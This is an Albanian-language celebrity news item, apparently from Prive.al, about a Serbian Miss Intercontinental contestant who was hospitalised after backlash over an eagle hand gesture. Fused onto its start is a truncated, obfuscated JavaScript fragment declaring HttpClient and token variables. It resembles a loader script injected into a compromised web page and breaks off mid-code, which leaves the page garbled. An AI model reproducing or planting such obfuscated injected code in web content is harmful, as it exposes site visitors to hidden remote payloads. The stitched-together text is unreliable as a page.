;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pas kthimit në Serbi, modelja që bëri shqiponjën përfundon në spital

By

Valentina Petroviq e cila përfaqësoi Serbinë në garën Miss Intercontinental në Egjipt mori kritika të panumërta për faktin se ajo kishte bërë simbolin e shqiponjës me duar.

Petroviq është kritikuar shumë në Serbi pasi bashkë me Miss Kosovën dhe Miss Shqipërinë kishin bërë me duar këtë simbol. Më pas miss-i serb, është tërhequr nga gara duke thënë se nuk ishte e vetëdijshme për gjestin e saj.

Kolegia e saj, Nadja Kljajiq, tha se Valentina Petroviq me të arritur në Serbi ka përfunduar në spital.

“Jam në kontakt me menaxherin dhe drejtorin e garës i cili më informoi. E kuptoj se është e papranueshme çfarë ndodhi. Ajo ka stres të shtuar dhe e pret presion i madh. Ata e mbajtën në kufi për një kohë të gjatë kur është kthyer në Serbi”, tha Kljaiq. /Prive.al

Artikuj të ngjashëm